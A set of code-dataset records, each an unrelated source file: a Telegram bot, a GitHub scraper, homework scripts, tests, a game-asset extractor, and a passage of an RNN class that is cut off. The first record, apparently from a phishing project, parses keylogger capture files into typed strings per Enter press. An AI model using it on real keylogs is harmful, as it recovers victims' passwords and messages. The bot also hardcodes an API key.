df\n\n\ndef group_keylogged_df(df, groupby_keypress = 'Key.enter'):\n\n df['group'] = np.nan\n df.loc[df['keypress'] == groupby_keypress, 'group'] = 1\n df['group'] = df.groupby('keypress')['group'].transform(lambda x: x.cumsum())\n df['group'].bfill(inplace=True)\n\n df_grouped = df.groupby('group').agg({'timestamp': [min, max],\n 'keypress': [lambda x: ''.join(x)],\n 'file_suffix': [min]})\n\n df_grouped.columns = list(pd.Index([str(e[0]).lower() + '_' + str(e[1]).lower()\\\n for e in df_grouped.columns.tolist()])\\\n .str.replace(' ', '_')\\\n .str.replace('_', '')\\\n .str.replace('file_suffix_min', 'file_suffix'))\n df_grouped.reset_index(inplace=True, drop=True)\n\n return df_grouped\n\n\n\n########################################\n##### parse the raw keylogged data #####\n########################################\n\nfiles_to_read = [READ_KEYLOGGED_DIR + i for i in list(itertools.chain(*list(itertools.chain.from_iterable([f for f in os.walk(READ_KEYLOGGED_DIR)])))) if i.endswith('.txt')]\n\nraw_keylogged_data = []\n\nfor f in files_to_read:\n raw_keylogged_data.append(open(f, 'r').readlines())\n\ndf = raw_keylog_data_to_df(raw_keylogged_data)\ndf['keypress'] = df['keypress'].str.replace('\\n', '').str.replace(\"'\", \"\")\n\ndf_grouped = group_keylogged_df(df)\n\ndf_grouped.to_csv(WRITE_KEYLOGGED_DIR + str(datetime.datetime.today()).replace(' ', ''))\n","sub_path":"phishing/scripts/parse_keylogged_output.py","file_name":"parse_keylogged_output.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"589854456","text":"#!/usr/bin/env python3\nimport sys\nimport urllib.request\nimport json\nimport csv\nimport time\n\nPAUSE = 0.1\n\ndef main(argv):\n owner = argv[0]\n repo = argv[1]\n token = argv[2]\n\n print('Getting watchers...')\n users = get_users(owner, repo, token)\n\n info = []\n\n print('Looking up user info...')\n info = get_info(users, token)\n\n if len(info) == 0:\n print('No users to lookup...exiting...')\n return\n\n csvf = open('watchers.csv', 'w')\n csvw = csv.writer(csvf)\n\n header = info[0].keys()\n csvw.writerow(header)\n\n for i in info:\n csvw.writerow(i.values())\n\n csvf.close()\n print(\"File writen to 'watchers.csv'\")\n return\n\ndef get_users(owner, repo, token):\n users = []\n reading = True\n page = 0\n\n while reading:\n url = 'https://api.github.com/repos/'+str(owner)+'/'+str(repo) \\\n +'/subscribers?page='+str(page)+'&access_token='+str(token)\n try:\n time.sleep(PAUSE)\n resp = urllib.request.urlopen(url)\n data = json.loads(resp.read())\n\n if data and len(data) > 0:\n for u in data:\n if u['login'] not in users:\n users.append(u['login'])\n print('Finished page '+str(page))\n page += 1\n else:\n reading = False\n\n except:\n print('Expception with URL... over rate limit?')\n reading = False\n\n print('Users found: '+str(len(users)))\n return users\n\ndef get_info(users, token):\n cnt = 1\n info = []\n\n for u in users:\n time.sleep(PAUSE)\n lookup = get_user_info(u, token)\n if lookup:\n info.append(lookup)\n if cnt % 10 == 0:\n print('Looked up '+str(cnt)+'/'+str(len(users))+' users')\n cnt += 1\n\n return info\n\ndef get_user_info(user, token):\n info = {}\n url = 'https://api.github.com/users/'+str(user)+'?access_token='+str(token)\n\n try:\n resp = urllib.request.urlopen(url)\n data = json.loads(resp.read())\n\n if data and len(data) > 0:\n return data\n else:\n return None\n\n except:\n print('Expception with URL... over rate limit?')\n return None\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 3:\n main(sys.argv[1:])\n else:\n print('Usage:')\n print('\\t'+sys.argv[0]+' ')\n","sub_path":"get-watchers.py","file_name":"get-watchers.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"594052661","text":"\"\"\"\nПросить пользователя ввести данные о себе - имя, дату рождения, профессию. \nПри вводе имени, проверять, что введено имя и фамилия, через пробел. \nЕсли нет, кидать исключение с нужным текстом. \nПри вводе даты рождения, просить вводить по отдельности - год, месяц и число. \nЕсли при вводе какого-то параметра введены символы, отличные от цифр, кидать исключение с нужным текстом. \nЕсли год больше 2000 - кидать ошибку. Если месяц больше 12, кидать ошибку. \nЕсли число больше 31, кидать ошибку ( ** добавить проверку, что в определенных месяцах дней может быть меньше 31). \nСохранять данные в файл с названием {name}.txt, в формате : {name};{bith date};{profession}\\n \n \nПри использовании механизма исключений для проверок, лучше сначала перечислять все «неблагоприятные условия» и исключения, \nа затем код, который должен работать, в случае, если все проверки успешны, все введено корректно. \nЭто сделает код более читабельным, избавит от лишних отступов и тп.\nНапример, функция, которая проверяет, что входная строка является числом, а число не больше 100. Сравните два варианта реализации\nhttps://gist.github.com/kryskaks/34f83a420de15bae36c5cb49b9c27b28\n\nПроверьте свою реализацию задания 1 из урока, если нужно, сделайте в соответствии с этой рекомендацией.\n\"\"\"\n\nCOUNT_DAYS_IN_MONTH = {1:31,2:29,3:31,4:30,5:31,6:30,7:31,8:31,9:30,10:31,11:30,12:31}\n\ndef collect_data():\n name = input(\"Enter your name: \")\n name = name.strip(\" \")\n elem = name.split()\n # if not name.strip().__contains__(\" \"):\n # raise Exception(\"Incorrect name type\")\n if len(elem) != 2:\n raise Exception(\"Incorrect name type\")\n birthday_year = input(\"Enter your year of birthday: \")\n # if not birthday_year.isdigit():\n # raise Exception(\"Not digit\")\n check_digit(birthday_year)\n if int(birthday_year) > 2000:\n raise Exception(\"More than 2000. Incorrect type\")\n birthday_month = input(\"Enter your month of birthday: \")\n # if not birthday_month.isdigit():\n # raise Exception(\"Not digit\")\n check_digit(birthday_month)\n if int(birthday_month) > 12:\n raise Exception(\"More than 12. Incorrect type\")\n birthday_day = input(\"Enter your day of birthday: \")\n # if not birthday_day.isdigit():\n # raise Exception(\"Not digit\")\n check_digit(birthday_day)\n if int(birthday_day) > COUNT_DAYS_IN_MONTH.get(int(birthday_month)):\n raise Exception(\"More than\", COUNT_DAYS_IN_MONTH.get(int(birthday_month)))\n birth_date = f\"{int(birthday_day):02d}.{int(birthday_month):02d}.{birthday_year}\"\n profession = input(\"Enter your profession: \")\n\n return name, birth_date, profession\n\ndef check_digit(data):\n if not data.isdigit():\n raise Exception(\"Not digit\")\n\ndef save_in_file(name, birth_date, profession):\n with open(name+\".txt\", 'w') as f:\n f.write(\";\".join([name,birth_date,profession,\"\\n\"]))\n # f.write(f\"{name};{birth_date};{profession}\\n\")\n\nname, birth_date, profession = collect_data()\nsave_in_file(name, birth_date, profession)","sub_path":"lesson13/task02.py","file_name":"task02.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34302062","text":"import telebot\r\nimport random\r\nimport time, re\r\nimport time\r\nimport pyowm\r\nimport requests\r\nfrom mqtt import *\r\nimport datetime\r\nimport reader\r\nimport os\r\nfrom dotenv import load_dotenv\r\nimport codecs\r\n\r\ntoken=load_dotenv()\r\ntoken = os.getenv('TOKEN')\r\nprint(token)\r\n\r\nf = codecs.open( 'taxinumbers.txt', \"r\", \"utf_8_sig\" )\r\ntaxicities = f.read()\r\ntaxicities = taxicities.split('\\r\\n')[:-1]\r\ntaxidict = dict()\r\n\r\nfor i in taxicities:\r\n key = i[:i.index(';')]\r\n taxidict[key] = i[i.index(';') + 2:]\r\n\r\ncommandlist = {'/start': 'start_message(message)', '/help' : 'help_message(message)', '/findtickets' : 'tickets_message(message)', '/route' : 'tickets_message(message)', '/weather' : 'weather_message(message)', '/music' : 'music_message(message)', '/developers' : 'developers_message(message)', '/taxi' : 'taxi_message(message)'}\r\ncommandlist_ru = {'старт': 'start_message(message)', 'помощь' : 'help_message(message)', 'маршрут' : 'tickets_message(message)', 'погода' : 'weather_message(message)', 'музыка' : 'music_message(message)', 'разработчики' : 'developers_message(message)', 'такси' : 'taxi_message(message)'}\r\nlovestickerpack = ['CAADAgAD2QADVp29CtGSZtLSYweoFgQ', 'CAADAgAD0gADVp29Cg4FcjZ1gzWKFgQ', 'CAADAgAD0wADVp29CvUyj5fVEvk9FgQ', 'CAADAgAD2AADVp29CokJ3b9L8RQnFgQ', 'CAADAgAD3gADVp29CqXvdzhVgxXEFgQ', 'CAADAgADFQADwDZPE81WpjthnmTnFgQ', 'CAADAgADBQADwDZPE_lqX5qCa011FgQ', 'CAADAgADDQADwDZPE6T54fTUeI1TFgQ', 'CAADAgADHQADwDZPE17YptxBPd5IFgQ', 'CAADAgAD4QcAAnlc4gndRsN-Tyzk1xYE', 'CAADAgAD3wcAAnlc4gmeYgfVO_CEsxYE', 'CAADAgAD4AcAAnlc4gmXqeueTbWXlRYE', ]\r\nquestionstickerpack = ['CAADAgAD4wADVp29Cg_4Isytpgs3FgQ', 'CAADAgADEgADwDZPEzO8ngEulQc3FgQ', 'CAADAgADEAADwDZPE-qBiinxHwLoFgQ', 'CAADAgADIAADwDZPE_QPK7o-X_TPFgQ', 'CAADAgAD2wcAAnlc4gkSqCLudDgLbhYE', 'CAADAgADzwcAAnlc4gnrZCnufdBTahYE', 'CAADAgAD2QcAAnlc4gn3Ww8qzk3S3BYE', 'CAADAgAD0gcAAnlc4gmLqZ82yF4OlxYE']\r\nangrystickerpack = ['CAADAgAD3AADVp29Cpy9Gm5Tg192FgQ', 'CAADAgAD2wADVp29Clxn-p9taVttFgQ', 'CAADAgADywADVp29CllGpcs9gzQoFgQ']\r\nloadstickerpack = ['CAADAgADGAADwDZPE9b6J7-cahj4FgQ', 'CAADAgAD1QADVp29CveXwRdcmk7nFgQ', 'CAADAgADwAADVp29Ct1dnTI9q-YvFgQ', 'CAADAgAD4QADVp29ClvBlItA-NOgFgQ', 'CAADAgAD5QADVp29CggLFmSVBdGKFgQ']\r\ndeveloperslist = ['рустам', 'ярослав', 'владимир', 'даниэль', 'игорь']\r\nnongratlist = ['арина', 'ариша', 'алия']\r\n\r\nkeyboard1 = telebot.types.ReplyKeyboardMarkup(True, True)\r\nkeyboard1.row('start', 'help', 'weather', 'developers')\r\nkeyboard1.row('music', 'findtickets', 'taxi')\r\n\r\nowm = pyowm.OWM('6d00d1d4e704068d70191bad2673e0cc', language = 'ru')\r\nbot = telebot.TeleBot(token)\r\n\r\nfromplace = str()\r\ntoplace = str()\r\ndateregistration = str()\r\nstatus = ''\r\n\r\n@bot.message_handler(commands=['taxi'])\r\ndef taxi_message(message):\r\n\tbot.send_message(message.chat.id, 'Введите город, в котором вы хотели бы заказать такси')\r\n\tbot.register_next_step_handler(message, taxi_telephone_numbers_message)\r\n\t\r\ndef taxi_telephone_numbers_message(message):\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\tglobal taxidict\r\n\t\tttnumbers = taxidict[message.text.lower()]\r\n\t\tttnumbers = ttnumbers.split('. ')\r\n\t\tttnumbers = '\\n'.join(ttnumbers)\r\n\t\tbot.send_message(message.chat.id, ttnumbers)\r\n\t\r\n@bot.message_handler(commands=['developers'])\r\ndef developers_message(message):\r\n\tprint('пока в разработке')\r\n\r\n\r\n@bot.message_handler(commands=['findtickets', 'route'])\r\n\r\ndef tickets_message(message):\r\n\tbot.send_message(message.chat.id, 'Введите город отправления')\r\n\tbot.register_next_step_handler(message, fromplace_registration)\r\n\t\r\ndef fromplace_registration(message):\r\n\tglobal commandlist\r\n\tglobal fromplace\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\tfromplace = message.text.lower()\r\n\t\tbot.send_message(message.chat.id, 'Введите город назначения')\r\n\t\tbot.register_next_step_handler(message, toplace_registration)\r\ndef toplace_registration(message):\r\n\tglobal commandlist\r\n\tglobal toplace\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\ttoplace = message.text.lower()\r\n\t\tbot.send_message(message.chat.id, 'Введите дату отправления')#rzd\r\n\t\tbot.register_next_step_handler(message, date_registration)\r\ndef date_registration(message):\r\n\tglobal commandlist\r\n\tglobal fromplace\r\n\tglobal toplace\r\n\tglobal dateregistration\r\n\tglobal loadsticerpack\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\tdateregistration = message.text.lower()\r\n\t\tprint(fromplace)\r\n\t\tprint(toplace)\r\n\t\tprint(dateregistration)\r\n\t\tSendler(fromInput=fromplace,fromOutput=toplace,date=dateregistration).send()\r\n\t\tbot.send_message(message.chat.id, 'Ищу билеты по выбранному направлению')\r\n\t\tbot.send_sticker(message.chat.id, random.choice(loadstickerpack))\r\n\t\tbot.send_message(message.chat.id, 'Билеты по маршруту {0} - {1} на {2} '.format(fromplace, toplace, dateregistration) + \"\\n\" + reader.read()) \r\n \r\n \r\n@bot.message_handler(commands=['start'])\r\n\r\ndef start_message(message):\r\n\tglobal weatherinformation\r\n\tglobal lovestickerpack\r\n\tbot.send_message(message.chat.id, 'Привет!\\nМеня зовут...плевать, я же тестовый бот\\nВот список моих функций на данный момент:\\n1./start\\n2./weather\\n3./help\\n4./rzd', reply_markup=keyboard1)\r\n\tbot.send_sticker(message.chat.id, random.choice(lovestickerpack))\r\n \r\n@bot.message_handler(commands=['weather'])\r\n\r\ndef weather_message(message):\r\n\tbot.send_message(message.chat.id, 'Напишите город, погодные условия которого вы хотели бы узнать')\r\n\tbot.register_next_step_handler(message, weather_information)\r\ndef weather_information(message):\r\n\tplace=''\r\n\tglobal status\r\n\tglobal angrystickerpack\r\n\tif message.text.lower() in commandlist:\r\n\t\texec(commandlist[message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telse:\r\n\t\ttry:\r\n\t\t\tplace = message.text.lower()\r\n\t\t\tobservation = owm.weather_at_place(place)\r\n\t\t\tweather = observation.get_weather()\r\n\t\t\tstatus = weather.get_detailed_status()\r\n\t\t\ttemp = weather.get_temperature('celsius')['temp']\r\n\t\t\twind = weather.get_wind()['speed']\r\n\t\t\tprint(weather)\r\n\t\t\tweathercity = message.text[0].upper() + message.text.lower()[1:]\r\n\t\t\tbot.send_message(message.chat.id, \"Погода города \" + weathercity + \"\\nТемпература: \" + str(temp) + \"°C\" + \"\\nНа улице: \" + str.title(status) + \"\\nСкорость Ветра: \" + str(wind) + \"м/c\")\r\n\t\t\tif temp >= 15:\r\n\t\t\t\tbot.send_message(message.chat.id, \"Погода-mood: Cамое-то \")\r\n\t\t\telif 15 > temp and temp > 0:\r\n\t\t\t\tbot.send_message(message.chat.id, \"Погода-mood: Накинь что нибудь на себя \")\r\n\t\t\telif temp < 0 and -25 < temp:\r\n\t\t\t\tbot.send_message(message.chat.id, \"Погода-mood: Одевайся мать, пора воевать \")\r\n\t\t\telif temp <= -25:\r\n\t\t\t\tbot.send_message(message.chat.id, \"Погода-mood: Ты умрёшь, если уйдёшь\")\r\n\t\texcept pyowm.exceptions.api_response_error.NotFoundError:\r\n\t\t\tbot.reply_to(message, 'Врешь, такого города нет на картах')\r\n\t\t\tbot.send_sticker(message.chat.id, random.choice(angrystickerpack))\r\n \r\n@bot.message_handler(commands=['help'])\r\ndef help_message(message):\r\n\tglobal lovestickerpack\r\n\tbot.send_message(message.chat.id, '1./start - эта функция позволяет Вам сбросить наш диалог и вернуться к исходной точке\\n2./weather - позволяет вам узнать состояние погоды в данном месте\\n3./help - эта функция сработала прямо сейчас')\r\n\tbot.send_sticker(message.chat.id,random.choice(lovestickerpack))\r\n \r\n \r\n@bot.message_handler(commands=['music'])\r\ndef music_message(message):\r\n\taudiolist = []\r\n\tfor i in range(3):\r\n\t\twhile True:\r\n\t\t\tn = random.randint(1,11)\r\n\t\t\tif n not in audiolist:\r\n\t\t\t\tbreak\r\n\t\taudiolist.append(n)\r\n\t\taudio = open(str(n) + \".mp3\", mode='rb')\r\n\t\tprint(\"opened \" + str(n) + \".mp3\")\r\n\t\tbot.send_audio(message.from_user.id, audio, timeout=1000)\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef text_analyze(message):\r\n\tglobal lovestickerpack\r\n\tglobal angrystickerpack\r\n\tglobal questionstickerpack\r\n\tif 'билеты' in message.text.lower() or 'найти билеты' in message.text.lower():\r\n\t\tbot.register_next_step_handler(message, tickets_message)\r\n\telif '/' + message.text.lower() in commandlist:\r\n\t\texec(commandlist['/' + message.text.lower()])\r\n\telif message.text.lower() in commandlist_ru:\r\n\t\texec(commandlist_ru[message.text.lower()])\r\n\telif message.text.lower() in developerslist:\r\n\t\tdevelopername = message.text[0].upper() + message.text.lower[1:]\r\n\t\tbot.reply_to(message, 'в моей системе рейтинга {0} стоит на первом месте'.format(developername))\r\n\t\tbot.send_sticker(message.chat.id, random.choice(lovestickerpack))\r\n\telif message.text.lower() in nongratlist:\r\n\t\tnongratname = message.text[0].upper() + message.text.lower()[1:]\r\n\t\tbot.reply_to(message, '{0}...{0}...звучит как что-то неприятное'.format(nongratname))\r\n\t\tbot.send_sticker(message.chat.id, random.choice(angrystickerpack))\r\n\telif message.text.lower():\r\n\t\tbot.reply_to(message, 'RUSSIAN, MOTHERFUCKER, DO YOU SPEAK IT ?')\r\n\t\tbot.send_sticker(message.chat.id, random.choice(questionstickerpack))\r\nbot.polling()\r\n","sub_path":"telegrambot[1].py","file_name":"telegrambot[1].py","file_ext":"py","file_size_in_byte":10669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294683999","text":"# -*- coding: utf-8 -*-\n\"\"\"Test them contribs.\"\"\"\n\nimport gitcontrib\nimport json\nimport pytest\nimport subprocess\nimport sys\n\nu_string = 'Usage:\\ngitcontrib [--json] [-p, --path path] [extension ...]\\n'\n\n\n@pytest.fixture\ndef git_repo(tmpdir):\n subprocess.check_call(['git', 'init', str(tmpdir)])\n return tmpdir\n\n\ndef test_usage(capsys):\n gitcontrib.usage()\n out, err = capsys.readouterr()\n assert err == u_string\n\n\ndef test_git(git_repo):\n assert 'nothing to commit' in gitcontrib.git(str(git_repo), 'status')\n\n\ndef test_badArg(capsys):\n sys.argv = ['gitcontrib', '-a']\n gitcontrib.main()\n out, err = capsys.readouterr()\n assert err == u_string\n\n\ndef test_json(capsys):\n total = 20\n auth = {'a': 12, 'b': 2, 'c': 1, 'd': 5}\n expect = 0.25\n gitcontrib.json_print(total, auth, expect)\n out, err = capsys.readouterr()\n j_data = json.loads(out)\n assert j_data['a']['met_expected']\n assert j_data['b']['lines'] == 2\n","sub_path":"test_gitcontrib.py","file_name":"test_gitcontrib.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"240493311","text":"# Aidan Bauer 1/31/20\nfrom turtle import *\nspeed(0)\nfor i in range(3):#loop for bottom row of circles\n circle(50)\n penup()\n forward(100)\n pendown()\npenup()\nsetposition(50,85)\npendown()\nfor i in range(2):#loop for second row of circles\n circle(50)\n penup()\n forward(100)\n pendown()\npenup()\nsetposition(100,170)\npendown()\ncircle(50)#makes top circle\n\nturtle.getscreen()._root.mainloop()","sub_path":"ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"440983490","text":"import json\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Credentials(dict):\n def __init__(self, **kwargs):\n dict.__init__(self, **kwargs)\n # We don't follow PEP8 here because we only pass this object as a JSON\n self.clientId = kwargs['clientId']\n self.accessToken = kwargs['accessToken']\n\n try:\n self.certificate = kwargs['certificate']\n except KeyError:\n logger.warning('''No certificate is present in the given credentials. If the credentials are temporary you won't be able to download anything''')\n\n def __getitem__(self, item):\n value = dict.__getitem__(self, item)\n # The taskcluster client always expects each argument of the Credentials to be a string,\n # even for the certificate. To let the user copy and paste the certificate directly from\n # https://auth.taskcluster.net/ without escaping all the quotes, we perform this change\n # of type.\n return self._enforce_string(value)\n\n @staticmethod\n def from_file(file_path):\n with open(file_path) as fd:\n credentials = json.load(fd)\n return Credentials(**credentials)\n\n @staticmethod\n def _enforce_string(value):\n return value if type(value) in (str, unicode) else json.dumps(value, ensure_ascii=True)\n","sub_path":"taskcluster_util/model/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"528727925","text":"'''Aula 10 - Exerc.05\r\nURI 1094\r\n'''\r\n#Felipe Backes Kettl\r\n\r\ntestes= int(input())\r\ntotal = 0\r\ntotalC = 0\r\ntotalR = 0\r\ntotalS = 0\r\n\r\nfor x in range(testes):\r\n qtd, tip = input().upper().split()\r\n qtd = int(qtd)\r\n total += qtd\r\n if 'C' in tip:\r\n totalC +=qtd\r\n elif 'R' in tip:\r\n totalR +=qtd\r\n elif 'S' in tip:\r\n totalS += qtd\r\n\r\nprint(f'Total: {total} cobaias')\r\nprint(f'Total de coelhos: {totalC}')\r\nprint(f'Total de ratos: {totalR}')\r\nprint(f'Total de sapos: {totalS}')\r\nprint(f'Percentual de coelhos: {(totalC/total) * 100:.2f} %')\r\nprint(f'Percentual de ratos: {(totalR/total)*100:.2f} %')\r\nprint(f'Percentual de sapos: {(totalS/total)*100:.2f} %')","sub_path":"Aula 10/Aula10_Ex05.py","file_name":"Aula10_Ex05.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"299996389","text":"def main():\n data_path = 'questions-words.txt'\n out_path = 'knock91_family'\n\n with open(out_path, 'w', encoding='utf8') as f:\n is_target = False\n lines = []\n for line in open(data_path, encoding='utf8'):\n if line.rstrip() == ': family':\n is_target = True\n continue\n if not is_target:\n continue\n if line.startswith(': '):\n break\n lines.append(line)\n f.writelines(lines)\n\n\nif __name__ == '__main__':\n main()\n\n\n''' 問\n91. アナロジーデータの準備\n\n単語アナロジーの評価データをダウンロードせよ.\nこのデータ中で\": \"で始まる行はセクション名を表す.\n例えば,\": capital-common-countries\"という行は,\n\"capital-common-countries\"というセクションの開始を表している.\nダウンロードした評価データの中で,\n\"family\"というセクションに含まれる評価事例を抜き出してファイルに保存せよ.\n'''\n\n''' 実行結果\n$ head knock91_family\nboy girl brother sister\nboy girl brothers sisters\nboy girl dad mom\nboy girl father mother\nboy girl grandfather grandmother\nboy girl grandpa grandma\nboy girl grandson granddaughter\nboy girl groom bride\nboy girl he she\nboy girl his her\n'''\n","sub_path":"homma/chapter10/knock91.py","file_name":"knock91.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"546644521","text":"import logging\nimport shutil\nimport threading\nimport tkinter as tk\nfrom pathlib import Path\nfrom tkinter import ttk\n\nfrom modlunky2.assets.assets import AssetStore\nfrom modlunky2.assets.constants import (\n EXTRACTED_DIR,\n FILEPATH_DIRS,\n OVERRIDES_DIR,\n PACKS_DIR,\n)\nfrom modlunky2.ui.utils import is_patched, log_exception\nfrom modlunky2.ui.widgets import Tab, ToolTip\n\nlogger = logging.getLogger(\"modlunky2\")\n\n\nMODS = Path(\"Mods\")\n\nTOP_LEVEL_DIRS = [EXTRACTED_DIR, PACKS_DIR, OVERRIDES_DIR]\n\n\nclass ExtractTab(Tab):\n def __init__(self, tab_control, install_dir, *args, **kwargs):\n super().__init__(tab_control, *args, **kwargs)\n self.tab_control = tab_control\n self.install_dir = install_dir\n\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n self.rowconfigure(1, minsize=60)\n\n self.top_frame = ttk.Frame(self)\n self.top_frame.rowconfigure(0, weight=1)\n self.top_frame.columnconfigure(0, weight=1)\n self.top_frame.columnconfigure(1, minsize=250)\n self.top_frame.grid(row=0, column=0, sticky=\"nswe\")\n\n self.exe_frame = ttk.LabelFrame(self.top_frame, text=\"Select exe to Extract\")\n self.exe_frame.grid(row=0, column=0, pady=5, padx=5, sticky=\"nswe\")\n self.exe_frame.rowconfigure(0, weight=1)\n self.exe_frame.columnconfigure(0, weight=1)\n self.exe_frame.columnconfigure(1)\n\n self.list_box = tk.Listbox(self.exe_frame)\n self.list_box.grid(row=0, column=0, sticky=\"nswe\")\n self.scrollbar = ttk.Scrollbar(self.exe_frame)\n self.scrollbar.grid(row=0, column=1, sticky=\"nes\")\n\n self.config_frame = ttk.LabelFrame(self.top_frame, text=\"Config\")\n self.config_frame.grid(row=0, column=1, pady=5, padx=5, sticky=\"nswe\")\n\n self.recompress = tk.BooleanVar()\n self.recompress.set(True)\n self.checkbox_recompress = tk.Checkbutton(\n self.config_frame,\n text='Recompress', variable=self.recompress, onvalue=True, offvalue=False,\n )\n self.checkbox_recompress.grid(row=0, sticky=\"nw\")\n ToolTip(self.checkbox_recompress, (\n \"Recompress assets to speed up futuring packing.\\n\"\n \"Not necessary if you just want the extracted assets.\"\n ))\n\n self.create_entity = tk.BooleanVar()\n self.create_entity.set(True)\n self.checkbox_create_entity = tk.Checkbutton(\n self.config_frame,\n text='Create Entity Sprites', variable=self.create_entity, onvalue=True, offvalue=False,\n )\n self.checkbox_create_entity.grid(row=1, sticky=\"nw\")\n ToolTip(self.checkbox_create_entity, (\n \"Create merged entity spritesheets. These provide a simpler\\n\"\n \"interface to some entity mods.\"\n ))\n\n self.list_box.config(yscrollcommand=self.scrollbar.set)\n self.scrollbar.config(command=self.list_box.yview)\n\n self.button_extract = ttk.Button(self, text=\"Extract\", command=self.extract)\n self.button_extract.grid(row=1, column=0, pady=5, padx=5, sticky=\"nswe\")\n ToolTip(self.button_extract, (\n \"Extract assets from EXE.\"\n ))\n\n def extract(self):\n idx = self.list_box.curselection()\n if not idx:\n return\n\n selected_exe = self.list_box.get(idx)\n thread = threading.Thread(\n target=self.extract_assets,\n args=(selected_exe, self.recompress.get(), self.create_entity.get()))\n thread.start()\n\n def get_exes(self):\n exes = []\n # Don't recurse forever. 3 levels should be enough\n exes.extend(self.install_dir.glob(\"*.exe\"))\n exes.extend(self.install_dir.glob(\"*/*.exe\"))\n exes.extend(self.install_dir.glob(\"*/*/*.exe\"))\n return [\n exe.relative_to(self.install_dir)\n for exe in exes\n # Exclude modlunky2 which is likely in the install directory\n if exe.name not in [\"modlunky2.exe\"]\n ]\n\n def on_load(self):\n self.list_box.delete(0, tk.END)\n for exe in self.get_exes():\n self.list_box.insert(tk.END, str(exe))\n\n @log_exception\n def extract_assets(self, target, recompress, create_entity_sheets):\n\n exe_filename = self.install_dir / target\n\n if is_patched(exe_filename):\n logger.critical((\n \"%s is a patched exe. Can't extract. You should Restore Exe\"\n \" or validate game files to get a clean exe before Extracting.\"\n ), exe_filename)\n return\n\n mods_dir = self.install_dir / MODS\n\n for dir_ in TOP_LEVEL_DIRS:\n (mods_dir / dir_).mkdir(parents=True, exist_ok=True)\n\n for dir_ in FILEPATH_DIRS:\n (mods_dir / EXTRACTED_DIR / dir_).mkdir(parents=True, exist_ok=True)\n (mods_dir / \".compressed\" / EXTRACTED_DIR / dir_).mkdir(\n parents=True, exist_ok=True\n )\n\n with exe_filename.open(\"rb\") as exe:\n asset_store = AssetStore.load_from_file(exe)\n unextracted = asset_store.extract(\n mods_dir / EXTRACTED_DIR,\n mods_dir / \".compressed\" / EXTRACTED_DIR,\n recompress=recompress,\n create_entity_sheets=create_entity_sheets,\n )\n\n for asset in unextracted:\n logger.warning(\"Un-extracted Asset %s\", asset.asset_block)\n\n dest = mods_dir / EXTRACTED_DIR / \"Spel2.exe\"\n if exe_filename != dest:\n logger.info(\"Backing up exe to %s\", dest)\n shutil.copy2(exe_filename, dest)\n\n logger.info(\"Extraction complete!\")\n","sub_path":"src/modlunky2/ui/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"339703926","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport tensorflow as tf\nfrom six.moves import range\nfrom matplotlib import pyplot as plt\n\n\nclass RNN(object):\n\n def __init__(self, summary_frequency, num_nodes, num_layers, num_unrollings, n_future,\n batch_generator, input_shape=3, only_retrain_output=False, output_keep_prob=1,\n cell=tf.nn.rnn_cell.LSTMCell):\n \n self.batch_generator = batch_generator \n self.batch_size = self.batch_generator.batch_size\n self.num_unrollings = num_unrollings\n self.n_future = n_future\n self.num_nodes = num_nodes \n self.summary_frequency = summary_frequency\n self.input_shape = input_shape\n self.only_retrain_output = only_retrain_output\n self.output_keep_prob = output_keep_prob\n self.session=tf.Session()\n\n self.minibatch_loss_list = []\n self.loss_list = []\n self.val_loss_list = []\n \n self.is_training = True\n cells = [cell(self.num_nodes) for _ in range(num_layers)]\n \n if 